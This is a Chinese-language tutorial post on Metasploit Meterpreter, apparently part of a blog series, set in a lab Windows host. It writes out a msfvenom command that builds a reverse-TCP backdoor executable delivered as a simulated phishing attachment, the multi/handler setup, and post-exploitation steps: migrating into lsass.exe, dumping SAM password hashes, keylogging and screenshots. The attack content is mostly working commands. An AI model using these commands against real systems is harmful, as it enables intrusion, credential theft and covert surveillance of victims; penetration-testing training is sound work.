Meterpreter 指令

昨天介紹了 Meterpreter 的指令列表，今天帶大家來實作。

我們測試的方法在攻擊主機產 msfvenom 的後門，因為目標主機為 Windows 因此指令為：
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=攻擊主機IP LPORT=攻擊主機監聽port -f exe -o ~/test.exe

並透過 Python3 構造一個簡單的 webserver，模擬情境為員工收到釣魚信件之後，下載惡意附件，並開啟該惡意檔案，由下圖可看到下載 test.exe。

透過 msfconsole 開啟 exploit/mult/handler，

1. msfconsole：開啟 CLI 介面
2. use exploit/multi/handler 使用監聽模組
3. set payload windows/shell/reverse_tcp：設定跟　msfvenom　所使用的 payload 一樣
4. set LHOST 172.28.128.6：設定攻擊主機IP
5. set LPORT 4444：設定攻擊主機 port
6. exploit：進行攻擊

如上圖看到C:\User\vagrant\Desktop 表示成功進入主機，此時輸入 background，將這次的連線移到背景執行。

可從指令sessions查看目前正在背景執行的連線。

使用 session -u <id> 將指定的連線提升使用 Meterpreter，就可以使用 Meterpreter 的指令，透過 sessions 可以看到目前背景有兩個連線狀態。

透過 session -i <id> 可以進入指定的連線，進行操作。

系統資訊
sysinfo
可以提供目標主機的資訊，如作業系統、登入使用者帳號、主機名稱。

取得使用者名稱
getuid
要確認目前進入的使用者帳號，我們的目標取的最高使用者的權限。

查看目標硬碟與其他設備
show_mount
可以看到目標主機連接的硬碟大小與其他如 CD/DVD 等資料，由下圖可看到掛載的C:\

查看目前空閒的時間
idletime
可以看到目前使用者處於非活動狀態的總時間。

shell
進入指令模式，有時候沒有辦法執行 shell，因此要透別注意。

確認 process
ps

指定移動到特定的 process
migrate <id>

切換成管理員權限

找到 SYSTEM ，id 484 lsass.exe 使用管理者的權限，因此可以切換到這個 process。

migrate 484

切換權限，並且使用 hashdump

hashdump 可以取得 Windows SAM 資料庫的內容，需要管理者的權限。

搜尋密碼相關檔案

測試 keyloagger

1. 在受害主機開啟 notepad
   
2. 尋找指定的 process
   pgrep notepag
   
3. 開始抓取
   keyscan_start
   
4. 使用者輸入任意字串
   
5. 取得資料關閉
   keyscan_dump
keyscan_stop
   

截圖
screenshot